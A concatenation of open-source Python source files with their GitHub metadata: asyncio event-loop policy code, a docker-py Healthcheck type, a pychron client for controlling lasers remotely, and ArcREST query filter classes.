        raise NotImplementedError

    def set_event_loop(self, loop):
        """Set the event loop for the current context."""
        raise NotImplementedError

    def new_event_loop(self):
        """Create and return a new event loop object."""
        raise NotImplementedError

    # Child processes handling (Unix only).

    def get_child_watcher(self):
        """Return the watcher for child processes."""
        raise NotImplementedError

    def set_child_watcher(self, watcher):
        """Set the watcher for child processes."""
        raise NotImplementedError
class BaseDefaultEventLoopPolicy(AbstractEventLoopPolicy):
    """Default policy implementation for accessing the event loop.

    Each thread has its own event loop, but one is only created
    automatically for the main thread; other threads start without one.

    Other policies may have different rules (e.g. a single global event
    loop, automatically creating an event loop per thread, or using some
    other notion of context to which an event loop is associated).
    """

    _loop_factory = None

    class _Local(threading.local):
        # Per-thread loop slot plus a flag recording that set_event_loop()
        # was called explicitly (suppresses lazy creation).
        _loop = None
        _set_called = False

    def __init__(self):
        self._local = self._Local()

    def get_event_loop(self):
        """Get the event loop.

        This may be None or an instance of EventLoop.
        """
        local = self._local
        # Lazily create a loop, but only for the main thread (detected via
        # the private threading._MainThread class) and only when
        # set_event_loop() has never been called explicitly.
        if (local._loop is None and
                not local._set_called and
                isinstance(threading.current_thread(), threading._MainThread)):
            self.set_event_loop(self.new_event_loop())
        assert local._loop is not None, \
            ('There is no current event loop in thread %r.' %
             threading.current_thread().name)
        return local._loop

    def set_event_loop(self, loop):
        """Set the event loop for the current thread."""
        self._local._set_called = True
        assert loop is None or isinstance(loop, AbstractEventLoop)
        self._local._loop = loop

    def new_event_loop(self):
        """Create a new event loop.

        You must call set_event_loop() to make it the current loop.
        """
        return self._loop_factory()
# Event loop policy.  The policy itself is always global, even if the
# policy's rules say that there is an event loop per thread (or other
# notion of context).  The default policy is installed by the first
# call to get_event_loop_policy().
_event_loop_policy = None

# Lock for protecting the on-the-fly creation of the event loop policy.
_lock = threading.Lock()


def _init_event_loop_policy():
    """Install the default policy exactly once, under _lock."""
    global _event_loop_policy
    with _lock:
        if _event_loop_policy is None:  # pragma: no branch
            from . import DefaultEventLoopPolicy
            _event_loop_policy = DefaultEventLoopPolicy()


def get_event_loop_policy():
    """Return the global event loop policy, creating it on first use."""
    if _event_loop_policy is None:
        _init_event_loop_policy()
    return _event_loop_policy


def set_event_loop_policy(policy):
    """Replace the global event loop policy (None resets to the lazy
    default)."""
    global _event_loop_policy
    assert policy is None or isinstance(policy, AbstractEventLoopPolicy)
    _event_loop_policy = policy


def get_event_loop():
    """Return the current event loop, as decided by the policy."""
    return get_event_loop_policy().get_event_loop()


def set_event_loop(loop):
    """Make *loop* the current event loop via the policy."""
    get_event_loop_policy().set_event_loop(loop)


def new_event_loop():
    """Create a new event loop via the policy."""
    return get_event_loop_policy().new_event_loop()


def get_child_watcher():
    """Return the child-process watcher via the policy."""
    return get_event_loop_policy().get_child_watcher()


def set_child_watcher(watcher):
    """Set the child-process watcher via the policy."""
    return get_event_loop_policy().set_child_watcher(watcher)
|
{
"content_hash": "77ee1101105fbad9858f887ddb3c6775",
"timestamp": "",
"source": "github",
"line_count": 485,
"max_line_length": 79,
"avg_line_length": 30.8,
"alnum_prop": 0.6180211541036283,
"repo_name": "leetreveil/tulip",
"id": "57af68afb641b243b104ccc038597b073012d33f",
"size": "14938",
"binary": false,
"copies": "7",
"ref": "refs/heads/master",
"path": "asyncio/events.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "38501"
},
{
"name": "Python",
"bytes": "779115"
},
{
"name": "Shell",
"bytes": "1223"
}
],
"symlink_target": ""
}
|
from .base import DictType
import six
class Healthcheck(DictType):
    """
    Defines a healthcheck configuration for a container or service.

    Args:
        test (:py:class:`list` or str): Test to perform to determine
            container health. Possible values:

            - Empty list: Inherit healthcheck from parent image
            - ``["NONE"]``: Disable healthcheck
            - ``["CMD", args...]``: exec arguments directly.
            - ``["CMD-SHELL", command]``: Run command in the system's
              default shell.

            If a string is provided, it will be used as a ``CMD-SHELL``
            command.
        interval (int): The time to wait between checks in nanoseconds. It
            should be 0 or at least 1000000 (1 ms).
        timeout (int): The time to wait before considering the check to
            have hung. It should be 0 or at least 1000000 (1 ms).
        retries (int): The number of consecutive failures needed to
            consider a container as unhealthy.
        start_period (int): Start period for the container to
            initialize before starting health-retries countdown in
            nanoseconds. It should be 0 or at least 1000000 (1 ms).
    """
    def __init__(self, **kwargs):
        # Accept both the pythonic lowercase kwargs and the raw API's
        # CamelCase keys (e.g. test= or Test=); lowercase wins if both given.
        test = kwargs.get('test', kwargs.get('Test'))
        if isinstance(test, six.string_types):
            # A bare string is shorthand for a shell-executed command.
            test = ["CMD-SHELL", test]
        interval = kwargs.get('interval', kwargs.get('Interval'))
        timeout = kwargs.get('timeout', kwargs.get('Timeout'))
        retries = kwargs.get('retries', kwargs.get('Retries'))
        start_period = kwargs.get('start_period', kwargs.get('StartPeriod'))
        super(Healthcheck, self).__init__({
            'Test': test,
            'Interval': interval,
            'Timeout': timeout,
            'Retries': retries,
            'StartPeriod': start_period
        })

    @property
    def test(self):
        # Command used to check health.
        return self['Test']

    @test.setter
    def test(self, value):
        self['Test'] = value

    @property
    def interval(self):
        # Nanoseconds between checks.
        return self['Interval']

    @interval.setter
    def interval(self, value):
        self['Interval'] = value

    @property
    def timeout(self):
        # Nanoseconds before a check is considered hung.
        return self['Timeout']

    @timeout.setter
    def timeout(self, value):
        self['Timeout'] = value

    @property
    def retries(self):
        # Consecutive failures needed to mark the container unhealthy.
        return self['Retries']

    @retries.setter
    def retries(self, value):
        self['Retries'] = value

    @property
    def start_period(self):
        # Grace period (ns) before failures start counting.
        return self['StartPeriod']

    @start_period.setter
    def start_period(self, value):
        self['StartPeriod'] = value
|
{
"content_hash": "06eb8f988cc750d45d22060727866970",
"timestamp": "",
"source": "github",
"line_count": 88,
"max_line_length": 78,
"avg_line_length": 31.25,
"alnum_prop": 0.5698181818181818,
"repo_name": "vpetersson/docker-py",
"id": "61857c21ce13f237bd914d6b3e97059eaca081e5",
"size": "2750",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "docker/types/healthcheck.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Makefile",
"bytes": "3260"
},
{
"name": "Python",
"bytes": "868992"
},
{
"name": "Shell",
"bytes": "749"
}
],
"symlink_target": ""
}
|
from __future__ import absolute_import
from __future__ import print_function
import os
import time
from threading import Thread
import six
import six.moves.cPickle as pickle
# ============= enthought library imports =======================
from traits.api import (
Str,
String,
on_trait_change,
Float,
Property,
Instance,
Event,
Enum,
Int,
Either,
Range,
cached_property,
)
from pychron import json
# ============= local library imports ==========================
from pychron.core.helpers.strtools import to_bool, csv_to_floats
from pychron.envisage.view_util import open_view
from pychron.globals import globalv
from pychron.hardware import get_float, get_blob
from pychron.lasers.laser_managers.ethernet_laser_manager import EthernetLaserManager
from pychron.paths import paths
class PychronLaserManager(EthernetLaserManager):
"""
A PychronLaserManager is used to control an instance of
pychron remotely.
Common laser functions such as enable_laser are converted to
the RemoteHardwareServer equivalent and sent by the communicator
e.g enable_laser ==> self.communicator.ask('Enable')
The communicators connection arguments are set in initialization.xml
use a communicator block
<plugin enabled="true" fire_mode="client">FusionsDiode
...
<communications>
<host>129.138.12.153</host>
<port>1069</port>
<kind>UDP</kind>
</communications>
</plugin>
"""
# communicator = None
# port = CInt
# host = Str
stage_manager_id = "fusions.pychron"
_cancel_blocking = False
mode = "client"
optics_client = Instance("pychron.lasers.laser_managers.client.LaserOpticsClient")
controls_client = Instance(
"pychron.lasers.laser_managers.client.LaserControlsClient"
)
# def shutdown(self):
# if self.communicator:
# self.communicator.close()
    def bind_preferences(self, pref_id):
        # Bind this manager's use_video flag to the application preference
        # "<pref_id>.use_video", then let the stage manager bind its own.
        from apptools.preferences.preference_binding import bind_preference
        bind_preference(self, "use_video", "{}.use_video".format(pref_id))
        self.stage_manager.bind_preferences(pref_id)
# def open(self):
# host = self.host
# port = self.port
#
# self.communicator = ec = EthernetCommunicator(host=host,
# port=port)
# r = ec.open()
# if r:
# self.connected = True
# self.opened()
#
# return r
# self.trait_set(**dict(zip(('_x', '_y', '_z'),
# self.get_position())))
    def get_tray(self):
        """Return the sample holder name reported by the remote pychron."""
        return self._ask("GetSampleHolder")
def get_error(self):
error = self._ask("GetError")
if error is None:
error = "Get Error Failed"
return error
# ===============================================================================
# patterning
# ===============================================================================
    def execute_pattern(self, name=None, block=False, duration=None):
        """
        name is either a name of a file
        or a pickled pattern obj
        """
        if name:
            self._patterning = True
            self._execute_pattern(name, block, duration)
            if block:
                # blocking run has finished; clear the in-progress flag.
                # Non-blocking runs are cleared later via stop_pattern().
                self._patterning = False
    def stop_pattern(self):
        """Abort any running pattern remotely and clear the in-progress flag."""
        self._ask("AbortPattern")
        self._patterning = False
def get_pattern_names(self):
# get contents of local pattern_dir
# ps = super(PychronLaserManager, self).get_pattern_names()
ps = []
# get contents of remote pattern_dir
pn = self._ask("GetJogProcedures")
if pn:
ps.extend(pn.split(","))
return ps
# ===============================================================================
# pyscript commands
# ===============================================================================
    def wake(self):
        """Wake the remote machine's screen."""
        self._ask("WakeScreen")
    def set_light(self, value):
        """Set the remote stage light to ``value``."""
        self._ask("SetLight {}".format(value))
    def acquire_grain_polygon(self):
        """Request a single grain-polygon blob from the remote pychron."""
        return self._ask("AcquireGrainPolygonBlob")
    def start_measure_grain_polygon(self):
        """Start grain-polygon measurement on the remote pychron."""
        return self._ask("StartMeasureGrainPolygon")
    def stop_measure_grain_polygon(self):
        """Stop grain-polygon measurement on the remote pychron."""
        return self._ask("StopMeasureGrainPolygon")
def get_grain_polygon_blob(self):
blobs = []
if globalv.laser_version > 0:
while 1:
blob = self._ask("GetGrainPolygonBlob")
if blob:
if blob == "No Response":
break
blobs.append(blob)
else:
break
return blobs
    @get_blob()
    def get_response_blob(self):
        """Fetch the response blob from the remote pychron.

        NOTE(review): presumably the @get_blob decorator decodes the reply
        to bytes -- confirm against pychron.hardware.get_blob.
        """
        return self._ask("GetResponseBlob", verbose=True)
    @get_blob()
    def get_output_blob(self):
        """
        needs to return bytes. GetOutputBlob sends a b64encoded string
        (presumably decoded to bytes by the @get_blob decorator -- confirm).
        :return:
        """
        return self._ask("GetOutputBlob")
    @get_float(default=0)
    def get_achieved_output(self):
        """Return the achieved laser output (coerced to float, default 0)."""
        return self._ask("GetAchievedOutput")
    @get_float(default=0)
    def get_pyrometer_temperature(self):
        """Return the pyrometer temperature (coerced to float, default 0)."""
        return self._ask("GetPyrometerTemperature")
# def do_machine_vision_degas(self, lumens, duration):
# if lumens and duration:
# self.info('Doing machine vision degas. lumens={}'.format(lumens))
# self._ask('MachineVisionDegas {},{}'.format(lumens, duration))
# else:
# self.debug('lumens and duration not set {}, {}'.format(lumens, duration))
    def start_video_recording(self, name):
        """Start video recording on the remote system, saved under ``name``."""
        self.info("Start Video Recording")
        cmd = {"command": "StartVideoRecording", "name": name}
        self._ask(json.dumps(cmd))
    def stop_video_recording(self):
        """Stop video recording on the remote system."""
        self.info("Stop Video Recording")
        return self._ask("StopVideoRecording")
    def take_snapshot(self, name, pic_format, view_snapshot=False):
        """Take a snapshot remotely and optionally display it locally.

        Returns the (local_path, remote_path, image) tuple decoded from the
        response, or implicitly None when the remote does not answer.
        """
        self.info("Take snapshot")
        resp = self._ask("Snapshot {},{}".format(name, pic_format))
        if resp:
            args = self._convert_snapshot_response(resp)
            if view_snapshot:
                self._view_snapshot(*args)
            return args
    def prepare(self):
        """Tell the remote laser to prepare, then poll until it is ready.

        Polls "IsReady" once per second; gives up after ``maxtries``
        periods (or after one in experiment_debug mode) or when
        ``_cancel_blocking`` is set.  Returns True when ready.
        """
        self.info("Prepare laser")
        self._ask("Prepare")
        cnt = 0
        tries = 0
        maxtries = 200  # timeout after ~200 s (period is 1 s)
        if globalv.experiment_debug:
            maxtries = 1
        nsuccess = 1
        self._cancel_blocking = False
        ask = self._ask
        period = 1
        cmd = "IsReady"
        while tries < maxtries and cnt < nsuccess:
            if self._cancel_blocking:
                break
            time.sleep(period)
            resp = ask(cmd)
            if resp is not None:
                try:
                    # only a parsable truthy response counts toward success;
                    # anything unparsable resets the success counter
                    if to_bool(resp):
                        cnt += 1
                except:
                    cnt = 0
            else:
                cnt = 0
            tries += 1
        return cnt >= nsuccess
    def end_extract(self, *args, **kw):
        """Zero the laser power and stop any in-progress pattern."""
        self.info("ending extraction. set laser power to 0")
        self.set_laser_power(0)
        if self._patterning:
            self.stop_pattern()
    def extract(self, value, units="", process=None, **kw):
        """Set the laser output; returns True when the remote replies OK."""
        self.info("set laser output")
        cmd = {"command": "SetLaserOutput", "value": value, "units": units}
        return self._ask(json.dumps(cmd)) == "OK"
        # return self._ask('SetLaserOutput {},{},{}'.format(value, units)) == 'OK'
    def enable_laser(self, *args, **kw):
        """Enable the laser; True when the remote replies OK."""
        self.info("enabling laser")
        return self._ask("Enable") == "OK"
    def disable_laser(self, *args, **kw):
        """Disable the laser; True when the remote replies OK."""
        self.info("disabling laser")
        return self._ask("Disable") == "OK"
    def set_laser_power(self, v, *args, **kw):
        """Set the laser power to ``v``; True when the remote replies OK."""
        self.info("set laser power {}".format(v))
        return self._ask("SetLaserPower {}".format(v)) == "OK"
    def set_motor_lock(self, name, value):
        """Lock or unlock motor ``name``.  Always returns True."""
        v = "YES" if value else "NO"  # human-readable form for the log only
        self.info("set motor {} lock to {}".format(name, v))
        # the wire protocol takes the lock state as 0/1
        self._ask("SetMotorLock {},{}".format(name, int(value)))
        return True
    def set_motor(self, name, value):
        """Set motor ``name`` to ``value`` and block until it stops moving."""
        self.info("set motor {} to {}".format(name, value))
        self._ask("SetMotor {},{}".format(name, value))
        time.sleep(0.5)
        # poll until the remote reports the motor is no longer moving
        r = self._block(cmd="GetMotorMoving {}".format(name))
        return r
    def get_position(self):
        """Return the current (x, y, z) stage position.

        Falls back to (0, 0, 0) when the reply is unparsable or when the
        communicator is simulating.  NOTE(review): an empty reply outside
        simulation falls through and implicitly returns None -- confirm
        callers tolerate that.
        """
        xyz = self._ask("GetPosition")
        if xyz:
            try:
                x, y, z = csv_to_floats(xyz)
                return x, y, z
            except Exception as e:
                print("pychron laser manager get_position", e)
                return 0, 0, 0
        if self.communicator.simulation:
            return 0, 0, 0
# handlers
# @on_trait_change('pattern_executor:pattern:canceled')
# def pattern_canceled(self):
# """
# this patterning window was closed so cancel the blocking loop
# """
# self._cancel_blocking = True
    def _pattern_executor_init_hook(self, pm):
        # When the pattern window reports cancellation, break out of any
        # blocking wait (e.g. prepare()'s IsReady loop).
        def handle():
            self._cancel_blocking = True
        pm.on_trait_change(handle, "pattern:canceled")
def _snapshot_button_fired(self):
self.take_snapshot("test", view_snapshot=True)
def _execute_pattern(self, pat, block, duration):
    """Send a pattern to the laser server and optionally block until
    patterning completes, aborting server-side on timeout.

    ``pat`` is a pattern name; a '.lp' extension is appended when
    missing.  When the file exists locally under paths.pattern_dir the
    path is pickled and sent instead of the bare name.
    """
    self.info("executing pattern {}".format(pat))

    if not pat.endswith(".lp"):
        pat = "{}.lp".format(pat)

    path = os.path.join(paths.pattern_dir, pat)
    if os.path.isfile(path):
        self.debug("Using local pattern {}".format(pat))
        # NOTE(review): this pickles the *path string*, not the pattern file
        # contents -- confirm the server side expects a pickled path
        pat = pickle.dumps(path)
        self.debug("Sending Pattern:{}".format(pat))

    self.debug("-------- laser version {}".format(globalv.laser_version))
    if globalv.laser_version > 0:
        # newer servers take a JSON command payload
        cmd = {"command": "DoPattern", "name": pat, "duration": duration}
        cmd = json.dumps(cmd)
    else:
        # legacy plain-text protocol
        cmd = "DoPattern {}".format(pat)

    self._ask(cmd, verbose=True)

    if block:
        time.sleep(0.5)
        # poll IsPatterning; if it never finishes, abort on the server
        if not self._block("IsPatterning", period=1, timeout=100):
            self._ask("AbortPattern")
# ===============================================================================
# pyscript private
# ===============================================================================
def _view_snapshot(self, local_path, remote_path, image):
    """Display a snapshot image in a lazily-created SnapshotView,
    reusing the application-level view and window when they exist."""
    from pychron.lasers.laser_managers.snapshot_view import SnapshotView

    open_required = False
    try:
        sv = self.application.snapshot_view
    except AttributeError:
        # first use: the application object has no snapshot_view yet
        sv = None
        open_required = True

    if sv is None:
        sv = SnapshotView()
        self.application.snapshot_view = sv

    sv.set_image(local_path, remote_path, image)

    if open_required:
        info = open_view(sv)
        self.application.snapshot_view_info = info
    else:
        if self.application.snapshot_view_info.control:
            # window still open: just bring it to the front
            self.application.snapshot_view_info.control.raise_()
        else:
            # window was closed by the user: open a fresh one
            info = open_view(sv)
            self.application.snapshot_view_info = info
def _convert_snapshot_response(self, ps):
    """Split a snapshot response into (local_path, remote_path, image).

    Wire layout: two hex digits giving len(local_path), the local path,
    two hex digits giving len(remote_path), the remote path, then the
    raw image blob.
    """
    local_len = int(ps[:2], 16)
    local_end = 2 + local_len
    local_path = ps[2:local_end]

    len_field_end = local_end + 2
    remote_end = len_field_end + int(ps[local_end:len_field_end], 16)
    remote_path = ps[len_field_end:remote_end]

    image = ps[remote_end:]
    self.debug("image len {}".format(len(image)))
    return local_path, remote_path, image
def _move_to_position(self, pos, autocenter, block):
    """Move the stage to a hole number (GoToHole) or an (x, y[, z])
    tuple (SetXY), then block until motion — and optionally
    auto-centering — settles.  Returns the final block() result."""
    cmd = "GoToHole {},{}".format(pos, autocenter)
    if isinstance(pos, tuple):
        # coordinate move; only x and y are sent
        cmd = "SetXY {}".format(pos[:2])
        # if len(pos) == 3:
        #     cmd = 'SetZ {}'.format(pos[2])

    self.info("sending {}".format(cmd))
    self._ask(cmd)

    time.sleep(0.5)
    # require several consecutive "not moving" answers before declaring done
    r = self._block(nsuccess=3, period=0.5)
    time.sleep(0.5)

    if autocenter and block:
        # wait for auto-correction to finish, then ensure it is stopped
        r = self._block(cmd="GetAutoCorrecting", period=0.5)
        self._ask("CancelAutoCorrecting")

    self.update_position()
    return r
# def _ask(self, cmd, **kw):
# # self.communicator.get_handler()
# return self.communicator.ask(cmd, **kw)
def _set_x(self, v):
    """Trait setter: move the stage X axis when moves are enabled."""
    if not self._move_enabled:
        return
    self._ask("SetX {}".format(v))
    self.update_position()
def _set_y(self, v):
    """Trait setter: move the stage Y axis when moves are enabled."""
    if not self._move_enabled:
        return
    self._ask("SetY {}".format(v))
    self.update_position()
def _set_z(self, v):
    """Trait setter: move the stage Z axis when moves are enabled."""
    if not self._move_enabled:
        return
    self._ask("SetZ {}".format(v))
    self.update_position()
# defaults
def _stage_manager_default(self):
    """Build the default stage manager.

    Managers whose name contains 'fusions' map to a
    ``fusions_<suffix>`` configuration directory.
    """
    config_dir = self.name.lower()
    if "fusions" in config_dir:
        # strip the leading 'fusions' and normalize the directory name
        config_dir = "fusions_{}".format(config_dir[7:])

    return self._stage_manager_factory(
        dict(
            name="stage",
            configuration_name="stage",
            configuration_dir_name=config_dir,
            parent=self,
        )
    )
def _controls_client_default(self):
    """Default controls client; imported lazily to avoid a hard
    dependency at module load time."""
    from pychron.lasers.laser_managers.client import LaserControlsClient

    return LaserControlsClient(parent=self)
def _optics_client_default(self):
    """Default optics client; imported lazily to avoid a hard
    dependency at module load time."""
    from pychron.lasers.laser_managers.client import LaserOpticsClient

    return LaserOpticsClient(parent=self)
class PychronUVLaserManager(PychronLaserManager):
    """Client-side manager for a remote UV laser.

    Extends the base pychron laser client with burst firing, motorized
    mask/attenuator/zoom control, and UV-specific positioning commands.
    """

    # NOTE(review): both traits point at UVLaser*Optics*Client -- the
    # controls_client presumably should be UVLaserControlsClient (that is
    # what _controls_client_default constructs); confirm.
    optics_client = Instance("pychron.lasers.laser_managers.client.UVLaserOpticsClient")
    controls_client = Instance(
        "pychron.lasers.laser_managers.client.UVLaserOpticsClient"
    )
    fire = Event
    stop = Event
    fire_mode = Enum("Burst", "Continuous")
    nburst = Property(depends_on="_nburst")
    _nburst = Int
    mask = Property(String(enter_set=True, auto_set=False), depends_on="_mask")
    _mask = Either(Str, Float)
    masks = Property
    attenuator = String(enter_set=True, auto_set=False)
    # attenuators = Property
    zoom = Range(0.0, 100.0)

    def set_reprate(self, v):
        # laser repetition rate; units are defined by the server
        self._ask("SetReprate {}".format(v))

    def extract(self, power, **kw):
        """Fire a burst of ``power`` pulses and block until firing stops."""
        self._set_nburst(power)

        time.sleep(0.25)
        self._ask("Fire burst")
        time.sleep(0.25)

        self._block("IsFiring", period=0.5)

    def end_extract(self):
        self._ask("Fire stop")

    def trace_path(self, value, name, kind):
        """Trace a named path; blocks until the server reports tracing done."""
        if isinstance(name, list):
            name = name[0]

        # traces need to be prefixed with 'l'
        name = str(name)
        name = name.lower()

        # if not name.startswith('l'):
        #     name = 'l{}'.format(name)

        cmd = "TracePath {},{},{}".format(value, name, kind)
        self.info("sending {}".format(cmd))
        self._ask(cmd)
        return self._block(cmd="IsTracing")

    def drill_point(self, value, name):
        # NOTE(review): cmd is built but never sent -- this method looks
        # unfinished (no self._ask(cmd) and 'value'/'name' are unused)
        cmd = "DrillPoint"

    # ===============================================================================
    #
    # ===============================================================================
    def _fire_fired(self):
        # Fire button/event handler: fire in the currently selected mode
        if self.fire_mode == "Continuous":
            mode = "continuous"
        else:
            mode = "burst"

        self.firing = True

        self._ask("Fire {}".format(mode))

    def _stop_fired(self):
        # Stop button/event handler
        self.firing = False
        self._ask("Fire stop")

    @on_trait_change("mask, attenuator, zoom")
    def _motor_changed(self, name, new):
        # push motor changes to the server off the UI thread
        if new is not None:
            t = Thread(target=self.set_motor, args=(name, new))
            t.start()

    # ===============================================================================
    #
    # ===============================================================================
    def _opened_hook(self):
        # sync local trait state from the server when the connection opens
        nb = self._ask("GetNBurst")
        self._nburst = self._get_int(nb)

        mb = self._ask("GetBurstMode")
        if mb is not None:
            self.fire_mode = "Burst" if mb == "1" else "Continuous"

        self._mask = 0

    def _move_to_position(self, pos, autocenter, block):
        """Move to a point; non-empty string positions beginning with
        t/l/d (transect/line/drill) are sent as named positions."""
        cmd = "GoToPoint"

        # if pos.startswith('t'):
        #     if not TRANSECT_REGEX[0].match(pos):
        #         cmd = None

        if isinstance(pos, (str, six.text_type)):
            if not pos:
                return

            if pos[0].lower() in ["t", "l", "d"]:
                cmd = "GoToNamedPosition"

        if cmd:
            cmd = "{},{}".format(cmd, pos)
            self.info("sending {}".format(cmd))
            self._ask(cmd)
            time.sleep(0.5)
            r = self._block()
            self.update_position()
            return r

    # ===============================================================================
    # property get/set
    # ===============================================================================
    def _get_int(self, resp):
        # parse an integer server response; 0 on failure
        r = 0
        if resp is not None:
            try:
                r = int(resp)
            except (ValueError, TypeError):
                pass
        return r

    def _validate_nburst(self, v):
        # traits validator: accept anything coercible to int, else None
        try:
            return int(v)
        except (ValueError, TypeError):
            pass

    def _set_nburst(self, v):
        # push the burst count to the server and cache it locally
        if v is not None:
            v = int(v)
            self._ask("SetNBurst {}".format(v))
            self._nburst = v

    def _get_nburst(self):
        return self._nburst

    def _set_mask(self, m):
        self._mask = m

    def _get_mask(self):
        return self._mask

    def _validate_mask(self, m):
        # accept a known mask name, or anything coercible to float
        if m in self.masks:
            return m
        else:
            try:
                return float(m)
            except ValueError:
                pass

    @cached_property
    def _get_masks(self):
        return self._get_motor_values("mask_names")

    def _get_motor_values(self, name):
        """Read non-blank, non-comment lines from the fusions_uv device
        file ``<name>.txt``."""
        p = os.path.join(paths.device_dir, "fusions_uv", "{}.txt".format(name))
        values = []
        if os.path.isfile(p):
            with open(p, "r") as rfile:
                for lin in rfile:
                    lin = lin.strip()
                    if not lin or lin.startswith("#"):
                        continue

                    values.append(lin)

        return values

    def _controls_client_default(self):
        from pychron.lasers.laser_managers.client import UVLaserControlsClient

        return UVLaserControlsClient(model=self)

    def _optics_client_default(self):
        from pychron.lasers.laser_managers.client import UVLaserOpticsClient

        return UVLaserOpticsClient(model=self)
# ============= EOF =============================================
|
{
"content_hash": "f8fe019f0f880af89074fe33b1b6885c",
"timestamp": "",
"source": "github",
"line_count": 637,
"max_line_length": 88,
"avg_line_length": 30.040816326530614,
"alnum_prop": 0.5159908026755853,
"repo_name": "NMGRL/pychron",
"id": "8d5b821064dd9f9b00200992abab5b228b419ac9",
"size": "19938",
"binary": false,
"copies": "2",
"ref": "refs/heads/main",
"path": "pychron/lasers/laser_managers/pychron_laser_manager.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "128"
},
{
"name": "C++",
"bytes": "3706"
},
{
"name": "CSS",
"bytes": "263"
},
{
"name": "Cython",
"bytes": "1692"
},
{
"name": "Fortran",
"bytes": "455875"
},
{
"name": "HTML",
"bytes": "46796"
},
{
"name": "Mako",
"bytes": "412"
},
{
"name": "Processing",
"bytes": "11421"
},
{
"name": "Python",
"bytes": "10773692"
},
{
"name": "Shell",
"bytes": "1003"
}
],
"symlink_target": ""
}
|
import os
import json
import time
import calendar
import datetime
from ..common.geometry import Polygon, Polyline, Point, MultiPoint
from .._abstract.abstract import AbstractGeometry, BaseFilter
import arcpy
########################################################################
class LayerDefinitionFilter(BaseFilter):
    """
    Allows you to filter the features of individual layers in the
    query by specifying definition expressions for those layers. A
    definition expression for a layer that is published with the
    service will always be honored.
    """
    # immutable template deep-copied for each added filter entry
    _filterTemplate = {"layerId" : "", "where" : "", "outFields" : "*"}
    #----------------------------------------------------------------------
    def __init__(self):
        """Constructor"""
        # BUG FIX: _ids and _filter used to be *class-level* lists, so every
        # instance shared and mutated the same filter list; they are now
        # per-instance state.
        self._ids = []
        self._filter = []
    #----------------------------------------------------------------------
    def addFilter(self, layer_id, where=None, outFields="*"):
        """ adds a layer definition filter (duplicates are ignored) """
        import copy
        f = copy.deepcopy(self._filterTemplate)
        f['layerId'] = layer_id
        f['outFields'] = outFields
        if where is not None:
            f['where'] = where
        if f not in self._filter:
            self._filter.append(f)
    #----------------------------------------------------------------------
    def removeFilter(self, filter_index):
        """ removes a layer filter based on position in filter list """
        # raises IndexError for an out-of-range index, as before
        f = self._filter[filter_index]
        self._filter.remove(f)
    #----------------------------------------------------------------------
    def removeAll(self):
        """ removes all items from the filter """
        self._filter = []
    #----------------------------------------------------------------------
    @property
    def filter(self):
        """ returns the filter object as a list of layer defs """
        return self._filter
########################################################################
class GeometryFilter(BaseFilter):
""" creates a geometry filter for queries
Inputs:
geomObject - a common.Geometry or arcpy.Geometry object
spatialFilter - The spatial relationship to be applied on the
input geometry while performing the query. The
supported spatial relationships include
intersects, contains, envelope intersects,
within, etc. The default spatial relationship
is intersects (esriSpatialRelIntersects).
Raises:
AttributeError for invalid inputs
"""
_allowedFilters = ["esriSpatialRelIntersects",
"esriSpatialRelContains",
"esriSpatialRelCrosses",
"esriSpatialRelEnvelopeIntersects",
"esriSpatialRelIndexIntersects",
"esriSpatialRelOverlaps",
"esriSpatialRelTouches",
"esriSpatialRelWithin"]
_geomObject = None
_spatialAction = None
_geomType = None
_spatialReference = None
#----------------------------------------------------------------------
def __init__(self, geomObject, spatialFilter="esriSpatialRelIntersects"):
"""Constructor"""
self.geometry = geomObject
if spatialFilter in self._allowedFilters:
self._spatialAction = spatialFilter
self._spatialReference = self.geometry.spatialReference
else:
raise AttributeError("geomObject must be a geometry object and "+ \
"spatialFilter must be of value: " + \
"%s" % ", ".join(self._allowedFilters))
#----------------------------------------------------------------------
@property
def spatialRelation(self):
""" gets the filter type """
return self._spatialAction
#----------------------------------------------------------------------
@spatialRelation.setter
def spatialRelation(self, value):
if value.lower() in \
[x.lower() for x in self._allowedFilters]:
self._spatialAction = value
else:
raise AttributeError("spatialRelation must be values of " + \
"%s" % ", ".join(self._allowedFilters))
#----------------------------------------------------------------------
@property
def geometryType(self):
""" returns the geometry type """
return self._geomObject.type
#----------------------------------------------------------------------
@property
def geometry(self):
""" gets the geometry object used by the filter """
return self._geomObject
#----------------------------------------------------------------------
@geometry.setter
def geometry(self, geometry):
""" sets the geometry value """
if isinstance(geometry, AbstractGeometry):
self._geomObject = geometry
self._geomType = geometry.type
elif isinstance(geometry, arcpy.Polygon):
self._geomObject = Polygon(geometry, wkid=geometry.spatialReference.factoryCode)
self._geomType = "esriGeometryPolygon"
elif isinstance(geometry, arcpy.Point):
self._geomObject = Point(geometry, wkid=geometry.spatialReference.factoryCode)
self._geomType = "esriGeometryPoint"
elif isinstance(geometry, arcpy.Polyline):
self._geomObject = Polyline(geometry, wkid=geometry.spatialReference.factoryCode)
self._geomType = "esriGeometryPolyline"
elif isinstance(geometry, arcpy.Multipoint):
self._geomObject = MultiPoint(geometry, wkid=geometry.spatialReference.factoryCode)
self._geomType = "esriGeometryMultipoint"
else:
raise AttributeError("geometry must be a common.Geometry or arcpy.Geometry type.")
#----------------------------------------------------------------------
@property
def filter(self):
""" returns the key/value pair of a geometry filter """
return {"geometryType":self.geometryType,
"geometry": json.dumps(self._geomObject.asDictionary),
"spatialRel": self.spatialRelation,
"inSR" : self._geomObject.spatialReference['wkid']}
#----------------------------------------------------------------------
########################################################################
class TimeFilter(BaseFilter):
""" Implements the time filter """
_startTime = None
_endTime = None
#----------------------------------------------------------------------
def __init__(self, start_time, time_zone="UTC", end_time=None):
"""Constructor"""
self._startTime = start_time
self._endTime = end_time
self._tz = time_zone
#----------------------------------------------------------------------
@property
def filter(self):
if not self._endTime is None:
val = "%s, %s" % (self._startTime, self._endTime)
return val
else:
return "%s" % self._startTime
|
{
"content_hash": "afa8b5c187d9f47815654921e9bbaf7b",
"timestamp": "",
"source": "github",
"line_count": 160,
"max_line_length": 95,
"avg_line_length": 45.19375,
"alnum_prop": 0.48679297469229704,
"repo_name": "achapkowski/ArcREST",
"id": "9e048cc008117817308f8fbea5e38d342b06c34b",
"size": "7231",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/arcrest/common/filters.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
